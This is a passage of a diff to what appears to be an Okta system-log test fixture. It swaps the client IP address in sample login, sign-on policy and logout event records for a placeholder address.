States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to 
Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in 
ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}" }, { - "message": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 
Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 
Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 
Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}" + "message": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}" }, { - "message": 
"{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}" + "message": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from 
Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to 
